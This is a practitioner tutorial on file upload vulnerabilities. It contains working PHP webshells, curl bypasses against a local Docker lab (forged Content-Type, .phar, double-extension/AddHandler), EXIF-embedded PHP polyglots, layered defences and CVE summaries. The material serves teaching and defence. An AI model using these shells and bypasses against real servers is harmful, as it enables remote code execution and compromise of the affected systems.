File Upload Vulnerabilities: 2026 Practitioner Guide

A file upload vulnerability is the cheapest one-step-from-RCE bug on the web. The attacker uploads a file the server is willing to execute, then makes a second request to that file's URL, and the server runs their code. Every weak validation pattern collapses into the same outcome: a webshell on disk, served by Apache or PHP-FPM or whatever the framework is, with the privileges of the application user.

Upload bugs are the ones I find easiest to demonstrate to a non-technical stakeholder. A .phar lands, a webshell opens, the room goes quiet. Easy to talk about, surprisingly hard to fully defend once you start counting all the ways a server can be coaxed into executing a blob it accepted as data.

This article is the deep dive companion to the web application security vulnerabilities taxonomy. I cover what the bug actually is, the four validation patterns I still see fail in code review, a working chain against a Dockerised lab, polyglots and image-borne shells, the defences that hold up in 2026, and a handful of real CVEs that put each pattern on a public record. Catalogued as CWE-434, this class is older than I am as a working engineer and is not going anywhere.

What is a file upload vulnerability?

A file upload vulnerability is any web upload feature where the server accepts a file whose name, content, or storage location lets the attacker get that file interpreted as code or markup rather than as opaque data. The server treats the upload as a passive blob (a profile picture, a CSV import, an attachment) while the attacker treats it as the first half of an attack that completes when the file is fetched, parsed, or executed.

The canonical bad code, in PHP, is one line of trust:

php

move_uploaded_file($_FILES['file']['tmp_name'], 'uploads/' . $_FILES['file']['name']);

There is no validation of the extension, the contents, or the destination. The attacker uploads shell.php with a body of <?php echo shell_exec($_GET['c']); ?>, requests uploads/shell.php?c=id, and the server runs id as www-data. Everything after this point is variations on the same theme: the validation that is supposed to prevent this turns out to be cosmetic, and the file ends up in a directory the web server is willing to execute from.

The trust failure is the same shape as SQL injection: user input is concatenated into something a downstream interpreter parses. The interpreter is just Apache plus mod_php instead of MySQL.

The four validation patterns that fail

Every weak upload validator I have looked at fits one of four shapes. They are listed in increasing order of effort, and decreasing order of how often I still see them in production.

Pattern 1: no validation at all

php

$dest = 'uploads/' . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $dest);

The function exists, it has a name in a routing table, and it does what the field implies: save the upload. There is no extension check, no MIME check, no size limit, no rename. Whatever bytes the client posted land on disk under whatever filename the client chose.

I still find this in 2026. It hides in admin tools that "only logged-in users can reach", in CMS plugin backends, in legacy file-manager modules that nobody touched after the original commit. The fact that it required authentication does not save anybody: the typical first credential leak (phishing, password reuse) hands the attacker a working session, and the bug is sitting behind it.

Pattern 2: extension blacklist (why blocklists always lose)

php

$blocked = ['php', 'phtml', 'php3', 'php4'];
$ext = strtolower(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION));
if (in_array($ext, $blocked, true)) {
    die('Bad file type');
}
move_uploaded_file($_FILES['file']['tmp_name'], 'uploads/' . $_FILES['file']['name']);

This is the classic loss. Blocklisting "the dangerous extensions" requires the developer to enumerate every extension that the server is configured to execute, on the operating system, web server, language interpreters, and modules in play at deploy time. Real-world misses:

.phar (PHP archive, executed by mod_php when the handler is configured for it, which is common on hosts that ship PHAR support enabled)
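.pht, .php5, .php7 (each one mapped to PHP by default in some Apache or PHP package on some distribution), plus .phps, which is usually mapped to the source highlighter rather than the interpreter but is still worth refusing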
.cgi, .pl (mod_cgi still ships, still gets enabled by mistake)
.html or .svg containing JavaScript (stored XSS rather than RCE, but same upload)
.htaccess itself, which lets the attacker rewrite the directory's handler config and then upload an innocently-named file that gets executed

The blocklist also has to fight encoding tricks: trailing dots (shell.php.), trailing spaces, null bytes in legacy PHP versions, alternate data streams on Windows hosts, and Unicode lookalikes. Every one of these has been the public root cause of a real bypass.
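As a rough illustration of the encoding tricks just listed, the sketch below flags filenames that use them. It assumes PHP 8 (for str_contains), the function name is hypothetical, and refusing every non-ASCII byte is a deliberately blunt choice rather than a recommendation for every application.

```php
<?php
declare(strict_types=1);

/**
 * Illustrative helper (hypothetical name): returns true when a client-supplied
 * filename uses one of the encoding tricks described in the text.
 */
function filename_looks_tampered(string $name): bool
{
    // Null byte: legacy PHP handed a truncated name to the filesystem call.
    if (str_contains($name, "\0")) {
        return true;
    }
    // Trailing dots or spaces: Windows strips them, so "shell.php." lands as "shell.php".
    if ($name !== rtrim($name, '. ')) {
        return true;
    }
    // Colon: NTFS alternate data stream syntax, e.g. "shell.php::$DATA".
    if (str_contains($name, ':')) {
        return true;
    }
    // Anything outside printable ASCII: a blunt way to refuse Unicode lookalikes.
    return preg_match('/[^\x20-\x7E]/', $name) === 1;
}
```

A check like this is a reason to reject a request early, not a replacement for generating the stored filename on the server.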

The structural problem is that a blocklist is a list of known bad. The set of executable extensions is open-ended, depends on server configuration the developer does not own, and grows when ops adds a new handler. An allowlist (['jpg', 'jpeg', 'png', 'gif', 'webp']) inverts that: the developer enumerates what the application needs, and rejects everything else. Allowlists fail closed; blocklists fail open. This is not a stylistic preference.
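A minimal sketch of the fail-closed behaviour, assuming an image-only upload feature. The constant and function names are hypothetical; the allowlist is the one from the paragraph above.

```php
<?php
declare(strict_types=1);

// The only extensions this (hypothetical) application needs.
const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'webp'];

/** Accepts a name only when its trailing extension is on the allowlist. */
function extension_is_allowed(string $clientName): bool
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXTENSIONS, true);
}

// Extensions nobody thought to block are rejected without being listed anywhere.
foreach (['photo.JPG', 'shell.phar', 'shell.pht', '.htaccess', 'shell.php.'] as $name) {
    printf("%-12s %s\n", $name, extension_is_allowed($name) ? 'accept' : 'reject');
}
```

Only photo.JPG is accepted. Adding a new handler on the server changes nothing here, which is the property a blocklist cannot offer.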

Pattern 3: MIME validation from the client-supplied Content-Type

php

if ($_FILES['file']['type'] !== 'image/jpeg') {
    die('Only JPEG allowed');
}
move_uploaded_file($_FILES['file']['tmp_name'], 'uploads/' . $_FILES['file']['name']);

$_FILES['file']['type'] is the Content-Type from the multipart body part the client sent. The client controls it. PHP's documentation says as much: the value is supplied by the browser and is not checked on the PHP side. Every other web framework has the same field, with the same property. The check rejects exactly the attackers who do not know HTTP, which is none of them.

The bypass is one curl flag:

bash

curl -F 'file=@shell.php;type=image/jpeg' http://target.example/upload.php

The multipart part for file now carries Content-Type: image/jpeg while its body is PHP. The validator sees image/jpeg, the file lands on disk as shell.php, and the GET that follows executes it.
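To make the point concrete, the sketch below builds a multipart part by hand. The helper name and the boundary string are made up for illustration; the only thing it is meant to show is that the part's Content-Type is a line of text the sender writes, with no connection to the bytes that follow.

```php
<?php
declare(strict_types=1);

/** Builds a single-part multipart/form-data body by hand (hypothetical helper). */
function build_file_part(
    string $boundary,
    string $field,
    string $filename,
    string $contentType,
    string $body
): string {
    return "--{$boundary}\r\n"
        . "Content-Disposition: form-data; name=\"{$field}\"; filename=\"{$filename}\"\r\n"
        . "Content-Type: {$contentType}\r\n"   // free text chosen by the client
        . "\r\n"
        . $body . "\r\n"
        . "--{$boundary}--\r\n";
}

// Declared type says JPEG; the body is PHP source.
$part = build_file_part(
    'XBOUNDARYX',
    'file',
    'shell.php',
    'image/jpeg',
    '<?php echo shell_exec($_GET["c"]); ?>'
);
echo $part;
```

On the server, PHP copies that Content-Type line into $_FILES['file']['type'] without looking at the body.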

The "stronger" variant is server-side MIME sniffing, where the application reads the first few bytes of the upload and uses something like PHP's finfo_file() or libmagic. That is much better but still not enough on its own: a JPEG with appended PHP, or a polyglot crafted to satisfy both a JPEG parser and the PHP interpreter, passes the magic-byte check while still being executable. The MIME check is part of a real defence (see below) but is never the whole thing.
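The limitation is easier to see with a toy sniffer. The function below is a simplified stand-in for a magic-byte check, not libmagic's actual rule set, and its name is hypothetical. It assumes PHP 8 for str_starts_with.

```php
<?php
declare(strict_types=1);

/**
 * Toy magic-byte sniffer: classifies by leading bytes only.
 * Real libmagic has far more rules; this is not its algorithm.
 */
function sniff_by_magic(string $bytes): string
{
    if (str_starts_with($bytes, "\xFF\xD8\xFF")) {
        return 'image/jpeg';
    }
    if (str_starts_with($bytes, "\x89PNG\r\n\x1A\n")) {
        return 'image/png';
    }
    if (str_starts_with($bytes, 'GIF87a') || str_starts_with($bytes, 'GIF89a')) {
        return 'image/gif';
    }
    return 'application/octet-stream';
}

$payload  = '<?php echo shell_exec($_GET["c"]); ?>';
// JPEG magic bytes, some padding, then the PHP payload.
$fakeJpeg = "\xFF\xD8\xFF\xE0" . str_repeat("\x00", 16) . $payload;

echo sniff_by_magic($payload), "\n";    // bare PHP is not classified as an image
echo sniff_by_magic($fakeJpeg), "\n";   // same payload behind JPEG magic is
```

The sniffer answers "what does this file start like", which is a different question from "can anything in this file be executed".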

Pattern 4: double-extension and the Apache AddHandler trap

php

$ext = strtolower(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION));
if (in_array($ext, ['php', 'phtml', 'phar'], true)) die('Bad file type');
move_uploaded_file($_FILES['file']['tmp_name'], 'uploads/' . $_FILES['file']['name']);

The validator is fine in isolation. pathinfo(..., PATHINFO_EXTENSION) returns the trailing extension only, so shell.php.jpg parses as jpg and gets accepted. The problem is what Apache does with the filename on the way back out.

Apache has two ways to map a filename to a handler:

SetHandler application/x-httpd-php inside a <FilesMatch \.php$> block: handler fires only when the trailing extension matches. Safe.
AddHandler application/x-httpd-php .php: handler fires when any segment of the filename matches .php. shell.php.jpg triggers it. So does shell.php.bak, shell.php.txt, shell.php.anything.

AddHandler is the default in a lot of older shared-hosting Apache configs. It is also the default in a handful of distribution-packaged PHP modules. A developer who validates the trailing extension correctly, against an upload directory whose .htaccess uses AddHandler, has shipped a working RCE without writing an obvious bug.

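The fix at the application layer is the allowlist from Pattern 2 plus a server-generated stored filename, because an allowlist on the trailing extension alone still accepts shell.php.jpg; the fix at the server layer is to replace AddHandler with the <FilesMatch> form anywhere user uploads land. Both belong in the build.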
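The mismatch between what the validator sees and what AddHandler sees can be modelled in a few lines. This is a simplified model of the matching rule described above, not Apache's code, and both function names are hypothetical. Per the mod_mime documentation, AddHandler's extension argument is case-insensitive, which the model mirrors.

```php
<?php
declare(strict_types=1);

/** What the Pattern 4 validator looks at: the last extension only. */
function trailing_extension(string $filename): string
{
    return strtolower(pathinfo($filename, PATHINFO_EXTENSION));
}

/**
 * Simplified model of AddHandler matching (not Apache's actual code):
 * every dot-separated segment after the base name counts as an extension.
 */
function addhandler_would_fire(string $filename, string $handlerExt = 'php'): bool
{
    $segments = explode('.', strtolower(basename($filename)));
    array_shift($segments);   // drop the base name before the first dot
    return in_array(strtolower(ltrim($handlerExt, '.')), $segments, true);
}

foreach (['photo.jpg', 'shell.php.jpg', 'shell.php.bak'] as $name) {
    printf(
        "%-14s validator sees: %-4s AddHandler fires: %s\n",
        $name,
        trailing_extension($name),
        addhandler_would_fire($name) ? 'yes' : 'no'
    );
}
```

Any filename where the two columns disagree is a candidate for this bypass.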

Walk a working chain (lab)

Every exploit below runs against upload-basic from the techearl-labs companion repo. Bring it up:

bash

docker compose up upload-basic

The lab listens on http://localhost:8083. There are four endpoints, each implementing one of the validation patterns above. The webshell I post in every case is the same one-line file:

php

<?php echo shell_exec($_GET['c'] ?? 'id'); ?>

Save it as shell.php in the working directory. Then attack each endpoint in turn.

Chain 1: naive upload

bash

curl -F 'file=@shell.php' http://localhost:8083/upload-naive.php
curl 'http://localhost:8083/uploads/naive/shell.php?c=id'

The response to the second request is the output of id from inside the container. No validation, no rename, no surprises. This is the worst-case shape and the fastest exploit to demonstrate.

Chain 2: blacklist with the forgotten extension

The lab's blacklist blocks php, phtml, php3, php4. It forgets phar, and the lab's Apache config explicitly maps .phar to mod_php (a realistic misconfiguration: PHAR support gets enabled for a tool that needs it, the upload validator never gets updated to match).

bash

curl -F 'file=@shell.php;filename=shell.phar' http://localhost:8083/upload-blacklist.php
curl 'http://localhost:8083/uploads/blacklist/shell.phar?c=id'

The ;filename=shell.phar segment is how curl rewrites the multipart filename. The validator extracts the extension, sees phar, checks the blocklist, finds no match, and lets the file through. Apache then routes the request to mod_php on the way back out.

A case-flip variant (shell.phP) is a common tutorial bypass, but it only works on Apache builds that match extensions case-insensitively. Stock mod_php on Debian-based images matches \.php$ literally; case-flip does not bypass against this lab. The forgotten-extension variant is what holds up against the real world.

Chain 3: MIME with a forged Content-Type

bash

curl -F 'file=@shell.php;type=image/jpeg' http://localhost:8083/upload-mime.php
curl 'http://localhost:8083/uploads/mime/shell.php?c=id'

The ;type=image/jpeg segment sets the multipart Content-Type header for the file part to image/jpeg. The file's bytes are still raw PHP. The validator reads $_FILES['file']['type'], sees the attacker's chosen value, and accepts. Three seconds from start to RCE.

Chain 4: double extension and AddHandler

bash

cp shell.php shell.php.jpg
curl -F 'file=@shell.php.jpg' http://localhost:8083/upload-double-ext.php
curl 'http://localhost:8083/uploads/double-ext/shell.php.jpg?c=id'

The validator extracts the trailing extension as jpg, accepts the upload, and writes it to disk under its original name. The directory's .htaccess declares AddHandler application/x-httpd-php .php. Apache sees a filename that contains .php, fires the handler regardless of position, and executes the file.

Four endpoints, four bypasses, one webshell. None of these took more than two HTTP requests.

Beyond simple file types: polyglots and image-borne shells

If the validator is doing real magic-byte sniffing (Pattern 3 done correctly), the attacker stops trying to upload bare .php and starts shipping files that are valid as their declared type and executable when interpreted as code. These are polyglots, and they are the answer to "we check the file is really an image".

PHP in JPEG EXIF metadata

The simplest polyglot is a real JPEG with PHP embedded in an EXIF comment field:

bash

exiftool -Comment='<?php echo shell_exec($_GET["c"]); ?>' shell.jpg

The file is structurally a JPEG. file shell.jpg returns JPEG image data, and finfo_file (which wraps libmagic) returns image/jpeg. Every content-type check passes. If the server then serves the file under a configuration that hands it to PHP (for example, stored as shell.php.jpg in an AddHandler directory, Pattern 4) or includes the file via include() somewhere downstream, the PHP block executes. The image renders correctly in a browser, which means even a visual review misses it.

This is why content-type validation by itself is insufficient: the file is honestly what it claims to be, and also a webshell.

PDF + PHP polyglots

PDF and PHP both tolerate leading garbage. A file that starts with a valid PDF header, contains a PDF body, and has <?php ... ?> inserted in a place the PHP parser will find it can satisfy both a PDF reader and the PHP interpreter. PDF parsers ignore bytes outside the document structure they understand; PHP scans for the opening tag. The same approach works for some Office formats and for SVG (which is just XML and which Chrome renders as an active document; an SVG with <script> is a stored XSS that bypasses every "is this an image" check).

GIFAR and friends

GIFAR (GIF + JAR) was the original 2008 polyglot: a file that is a valid GIF for image-loaders and a valid Java archive for the Java plugin. The Java plugin is dead, so the original variant is mostly history, but the technique generalises. Modern equivalents include polyglots that are valid PNG and valid JavaScript (an image the attacker gets a page to load through a <script> tag instead of an <img> tag), and ZIP polyglots that are valid image and valid archive (relevant for upload features that unpack archives server-side).

The defence is not a better polyglot detector. The defence is to never serve uploaded files from a context where their bytes can be interpreted as code. The next section is how.

Modern defences

Upload security is a stack. No single check is sufficient; the combination is what holds.

1. Allowlist on extension AND magic bytes

php

$allowed_ext = ['jpg', 'jpeg', 'png', 'gif', 'webp'];
$allowed_mime = ['image/jpeg', 'image/png', 'image/gif', 'image/webp'];

$ext = strtolower(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION));
if (!in_array($ext, $allowed_ext, true)) {
    die('Extension not allowed');
}

$finfo = new finfo(FILEINFO_MIME_TYPE);
$mime = $finfo->file($_FILES['file']['tmp_name']);
if (!in_array($mime, $allowed_mime, true)) {
    die('Content does not match allowed types');
}

The extension allowlist is enforced first, against the trailing extension only and against a fixed set. The magic-byte check uses libmagic (finfo in PHP, python-magic in Python; in Node, the mime-types package is not enough because it only maps extensions and never reads the file) to confirm the file body is one of the allowed types. Either check failing rejects the upload.

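This still does not stop polyglots that satisfy both checks, and a polyglot named shell.php.jpg would still hit the AddHandler trap if it were stored under its original name. It does stop the raw-PHP uploads used in Patterns 1 through 4.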
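One optional tightening, sketched here under the assumption that the sniffed type comes from finfo as in the block above: require the extension and the sniffed type to agree with each other, rather than each being independently on a list. The map and function name are hypothetical.

```php
<?php
declare(strict_types=1);

// Which sniffed MIME type each allowed extension must correspond to (illustrative map).
const EXTENSION_TO_MIME = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
    'webp' => 'image/webp',
];

/** True only when the trailing extension is allowed AND matches the sniffed content type. */
function extension_agrees_with_content(string $clientName, string $sniffedMime): bool
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return array_key_exists($ext, EXTENSION_TO_MIME)
        && EXTENSION_TO_MIME[$ext] === $sniffedMime;
}

// Typical call site (needs a real upload, so shown as a comment):
//   $mime = (new finfo(FILEINFO_MIME_TYPE))->file($_FILES['file']['tmp_name']);
//   if (!extension_agrees_with_content($_FILES['file']['name'], $mime)) { die('Rejected'); }
```

This rejects a GIF uploaded as photo.png, which the two independent list checks would accept. It does nothing extra against a polyglot whose name and magic bytes agree.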

2. Randomise the stored filename

php

$ext = strtolower(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION));
$stored = bin2hex(random_bytes(16)) . '.' . $ext;
move_uploaded_file($_FILES['file']['tmp_name'], '/var/uploads/' . $stored);

The attacker no longer controls the filename. Path traversal in the name is dead. Overwriting index.php is dead. Double-extension tricks are dead (the new name is <hex>.jpg, with one extension). Storing the original name in a database column for display is fine; storing it on disk is not.
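The same idea wrapped as a function that fails closed, as a sketch. The function name is hypothetical, and the allowlist is passed in so the example stays self-contained.

```php
<?php
declare(strict_types=1);

/**
 * Returns a server-generated name for an accepted upload, or null to reject.
 * Nothing from the client's filename survives except an allowlisted extension.
 */
function stored_name_for(string $clientName, array $allowedExt): ?string
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        return null;   // fail closed
    }
    return bin2hex(random_bytes(16)) . '.' . $ext;   // 32 hex characters plus one extension
}

$allowed = ['jpg', 'jpeg', 'png', 'gif', 'webp'];
var_dump(stored_name_for('shell.php.jpg', $allowed));    // random hex name ending in .jpg
var_dump(stored_name_for('../../index.php', $allowed));  // NULL
```

The .php segment of shell.php.jpg never reaches the disk, so the AddHandler trap has nothing to match.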

3. Store outside the web root

Move the upload directory off whatever path Apache or Nginx serves. Files now live at /var/uploads/, not /var/www/public/uploads/. The web server cannot serve them at all without an explicit route. This single change defeats every variant of "upload a webshell and request it directly", because the file's URL does not exist.
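A deploy-time sanity check for this can be small. The sketch below compares two absolute paths as strings; the function name is hypothetical, and it assumes the paths are already resolved (in a real check, run both through realpath() first so symlinks and .. segments cannot hide the relationship).

```php
<?php
declare(strict_types=1);

/**
 * True when $uploadDir is neither the web root nor anywhere beneath it.
 * Both arguments are expected to be absolute, already-resolved paths.
 */
function is_outside_web_root(string $uploadDir, string $webRoot): bool
{
    // Trailing slashes stop /var/www/public-uploads from matching /var/www/public.
    $upload = rtrim($uploadDir, '/') . '/';
    $root   = rtrim($webRoot, '/') . '/';
    return !str_starts_with($upload, $root);
}

var_dump(is_outside_web_root('/var/uploads', '/var/www/public'));             // bool(true)
var_dump(is_outside_web_root('/var/www/public/uploads', '/var/www/public'));  // bool(false)
```

Running a check like this at application start turns a silent misconfiguration into a loud one.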

4. Serve uploads through a controller

php

// /download.php?id=<id>
header('Content-Type: ' . $file->mime);
header('Content-Disposition: attachment; filename="' . $file->safe_name . '"');
header('X-Content-Type-Options: nosniff');
readfile($file->path);

The controller looks up the file by an opaque ID, sets the Content-Type the application chose (not whatever the file claims), adds Content-Disposition: attachment so the browser saves rather than renders, and adds X-Content-Type-Options: nosniff so the browser does not second-guess the type. An SVG-with-script no longer renders as active content; a polyglot served this way is a download, not an execution.

OWASP's guidance explicitly recommends both headers together and serving uploads from a separate isolated domain so that any successful XSS (e.g. an HTML upload) cannot reach session cookies on the main app.
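A sketch of how the controller's headers might be assembled so that the display name cannot break out of the header. The function name is hypothetical, and replacing every character outside a small safe set is one conservative choice among several.

```php
<?php
declare(strict_types=1);

/**
 * Builds the response headers for a controller-served download.
 * $storedMime is the type the application recorded at upload time,
 * never a value read back from the file or the client.
 */
function download_headers(string $storedMime, string $displayName): array
{
    // Conservative character set: quotes, CR/LF and path separators all become "_".
    $safeName = preg_replace('/[^A-Za-z0-9._-]/', '_', $displayName);
    return [
        'Content-Type: ' . $storedMime,
        'Content-Disposition: attachment; filename="' . $safeName . '"',
        'X-Content-Type-Options: nosniff',
    ];
}

// In the controller, each line would be passed to header() before readfile().
foreach (download_headers('image/jpeg', "holiday photo\".jpg") as $line) {
    echo $line, "\n";
}
```

Keeping header construction in one function also gives a single place to test for header injection.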

5. Strip metadata

bash

exiftool -all= upload.jpg

Every uploaded image runs through metadata-stripping before storage. This kills EXIF-embedded webshells and incidentally also kills GPS coordinates and camera serial numbers (a privacy win). Server-side, ImageMagick, mat2, or a libvips re-encode pass does the same job.

Note that running uploads through an image library is itself a defence: a real JPEG decode followed by a re-encode produces a new file that contains only image data and discards any non-image bytes the original had appended.
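A minimal sketch of the re-encode pass, assuming the GD extension is available and that JPEG output is acceptable for every upload. The function name is hypothetical. It drops metadata and appended bytes because only decoded pixels are written back; it is not a guarantee against payloads crafted to survive a specific encoder.

```php
<?php
declare(strict_types=1);

/**
 * Decodes the upload as an image and writes a fresh JPEG (requires ext-gd).
 * Returns false when the bytes do not decode as an image at all.
 */
function reencode_as_jpeg(string $srcPath, string $dstPath, int $quality = 85): bool
{
    $bytes = file_get_contents($srcPath);
    if ($bytes === false || $bytes === '') {
        return false;
    }
    // @ silences the warning GD raises for undecodable input; the false return is handled below.
    $image = @imagecreatefromstring($bytes);
    if ($image === false) {
        return false;
    }
    // Only pixel data is written out; comments, EXIF and trailing bytes are not copied.
    return imagejpeg($image, $dstPath, $quality);
}
```

Store the re-encoded file and discard the original, so the bytes the attacker sent never reach the upload directory.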

6. Run files through ClamAV or YARA

bash

clamscan --infected --remove --recursive /var/uploads/

ClamAV catches known webshells (its signature database includes thousands of PHP, ASP, and JSP shells). YARA lets you write custom signatures for the patterns you care about (<?php immediately following image-format magic bytes, for instance). Neither catches a novel polyglot. Both raise the cost of off-the-shelf attacker tooling.
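The kind of pattern a custom rule might express can be approximated in PHP for illustration. This is a heuristic sketch with a hypothetical function name, not a YARA rule and not a substitute for one; it deliberately ignores the short <?= tag, since a three-byte sequence turns up by chance in compressed image data often enough to cause false positives.

```php
<?php
declare(strict_types=1);

/**
 * Heuristic: does a file that starts like an image also contain a PHP open tag?
 * Returns false for non-images, which are out of scope for this rule.
 */
function image_contains_php_tag(string $bytes): bool
{
    $startsLikeImage = str_starts_with($bytes, "\xFF\xD8\xFF")   // JPEG
        || str_starts_with($bytes, "\x89PNG\r\n\x1A\n")          // PNG
        || str_starts_with($bytes, 'GIF8');                      // GIF87a / GIF89a
    if (!$startsLikeImage) {
        return false;
    }
    // Case-insensitive search for the long open tag anywhere in the file.
    return stripos($bytes, '<?php') !== false;
}

$clean    = "\xFF\xD8\xFF\xE0" . str_repeat("\x00", 32);
$polyglot = $clean . '<?php echo shell_exec($_GET["c"]); ?>';

var_dump(image_contains_php_tag($clean));     // bool(false)
var_dump(image_contains_php_tag($polyglot));  // bool(true)
```

Like the signature scanners, this raises the cost of lazy payloads and nothing more; an attacker who knows the rule can encode around it.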

7. Drop execute permissions on the upload directory

bash

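# Shell: clear the execute bit on stored files. This blocks CGI-style execution only; mod_php does not check it.
chmod 0644 /var/uploads/*
# and, at the Apache layer (server config such as httpd.conf or a vhost file, not the shell and not .htaccess):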
<Directory /var/uploads>
    Options -ExecCGI
    SetHandler default-handler
    RemoveHandler .php .phtml .phar
</Directory>

Belt-and-braces: even if a .php file makes it onto disk, the web server is configured to not interpret anything in that directory. Combined with storage outside the web root, this is two layers of "even if the file is there, it does not run".

Real-world incidents (CVE section)

Three CVEs that put each pattern on a public record, all verified against NVD as of the date of writing.

CVE-2016-3714 (ImageTragick)

Affected ImageMagick versions before 6.9.3-10 and 7.x before 7.0.1-1. The MVG, MSL, HTTPS, EPHEMERAL, TEXT, SHOW, WIN, and PLT coders failed to validate input before passing it to shell commands. An attacker uploaded an image file whose contents triggered one of those coders, and ImageMagick executed shell commands with the privileges of the process running it. CVSS 3.1 score 8.4 (HIGH); CVSS 2.0 score 10.0. Still in CISA's Known Exploited Vulnerabilities catalogue.

This is the case where the upload validator was correct (the file really was an image) and the bug was in the downstream tool that processed it. The defence is to upgrade ImageMagick, disable the vulnerable coders in policy.xml, and treat any user-supplied image as untrusted input to every library that touches it afterwards.

CVE-2017-5638 (Apache Struts Jakarta Multipart parser)

Affected Apache Struts 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1. Incorrect exception handling in the Jakarta Multipart file-upload parser meant that a crafted Content-Type header containing OGNL expressions (the canonical payload included a #cmd= segment) was evaluated as code rather than treated as a string. The result was unauthenticated RCE against any Struts 2 application that accepted file uploads, scoring 9.8 CRITICAL.

This is the case where the upload was incidental: the attacker did not need to upload a useful file, only to send a request the upload parser would handle. Equifax's 2017 breach traced back to this CVE.

CVE-2018-9206 (Blueimp jQuery File Upload)

Affected all versions of Blueimp's jQuery-File-Upload up to and including 9.22.0. The upstream server component shipped with an example PHP handler that accepted any uploaded file and stored it inside the web root, relying on a bundled .htaccess file to block execution of what landed there. Since Apache 2.3.9 the default for AllowOverride is None, so on a stock configuration that .htaccess was silently ignored; the library's defence quietly broke when the surrounding ecosystem changed. CVSS 3.1 score 9.8 CRITICAL.

This is the case where the validator was the surrounding server config, and the surrounding server config changed underneath it. The library itself had a fix within days; the harder problem was finding and patching every fork (there were thousands on GitHub). The lesson is to never depend on server defaults for security-critical behaviour, and to assert the behaviour you need explicitly in your own config.

FAQ

Is checking Content-Type: image/jpeg ever safe on its own?

No. The Content-Type in the multipart upload body is attacker-controlled. A single curl option rewrites it. Server-side magic-byte sniffing with libmagic is the real version of this check, and even that is only one layer: a JPEG with PHP embedded in its EXIF metadata is a real JPEG by every magic-byte test. Combine extension allowlisting, magic-byte sniffing, metadata stripping, and never serving uploads from an executable path.

Does serving uploads from a separate subdomain stop XSS-via-upload?

It stops the most damaging variant. An SVG or HTML upload that contains JavaScript, served from uploads.example.com instead of www.example.com, runs in a different origin and cannot read session cookies on the main domain. The attacker can still serve malicious content from your subdomain (phishing, drive-by, malvertising), so it is a containment measure, not a fix. Pair it with Content-Disposition: attachment and X-Content-Type-Options: nosniff and you have the full OWASP-recommended setup.

Can I just rename every upload to .txt and serve it that way?

It blocks Apache from executing the file, which is most of what you want. It does not solve everything: Content-Type sniffing in older browsers, polyglot files that some clients render anyway, and any code path on your server that later reads the file by content rather than extension. Rename plus randomise plus store-outside-webroot plus controller-served downloads is the safe combination; rename alone is one layer.

Why are allowlists always better than blacklists for upload validation?

An allowlist enumerates the set of values you expect. A blacklist enumerates the set you do not expect. The set of dangerous extensions on a given Apache or Nginx install depends on the operating system, the web server build, the language interpreters, the modules enabled, and any custom handlers, and that set changes when ops adds a new module. You cannot enumerate something you do not own. Allowlists fail closed when the environment changes; blacklists fail open.

Is ClamAV enough to make file uploads safe?

No. ClamAV catches known signatures of known webshells and malware, which raises the cost of off-the-shelf attacker tooling but does nothing against a novel polyglot or a webshell variant the signature database has not seen. Treat ClamAV as detection and as a deterrent against opportunistic uploads, not as the control that decides whether an upload is safe. The controls that decide are extension allowlisting, magic-byte sniffing, storage outside the web root, and controller-served downloads.

What about uploading to S3 or another object store, does that solve it?

S3 helps with two things: the file is not on your web server's disk, and S3 will not execute it. It does not help with the file's contents (a malicious SVG served from an S3 bucket with a permissive Content-Type still XSSes whoever opens it) or with what your application does after the upload (if you image-process it, ImageMagick still has the same coder bugs). Sign S3 uploads server-side, set Content-Type and Content-Disposition as object metadata at upload time, add X-Content-Type-Options: nosniff at the CDN layer (for example through a CloudFront response headers policy), serve through a CloudFront distribution on a separate domain, and validate content before you accept it. The cloud is a deployment choice; the validation stack is the same.

Do modern PHP versions still have the null-byte filename bug?

PHP 5.3.4 and later reject null bytes in filenames passed to filesystem functions. The bug where shell.php\x00.jpg passed an extension check as .jpg (string functions such as pathinfo() saw the full string) but was written to disk as shell.php (the underlying filesystem call stopped at the null byte) is therefore a problem only against PHP 5.3.3 and earlier, which you should not be running. The structural lesson, that user input crosses a trust boundary every time it touches a system call, is what to take from it.

Where to go next

Compare the practical tools in the best file upload exploitation tools for 2026.
Back up to the web application security vulnerabilities taxonomy for the full map of related classes (RCE, path traversal, SSRF, deserialization).
For the closest cousin in shape (untrusted input as code, parser confusion, one-step-from-RCE), read the SQL injection guide.

Ishan Karunaratne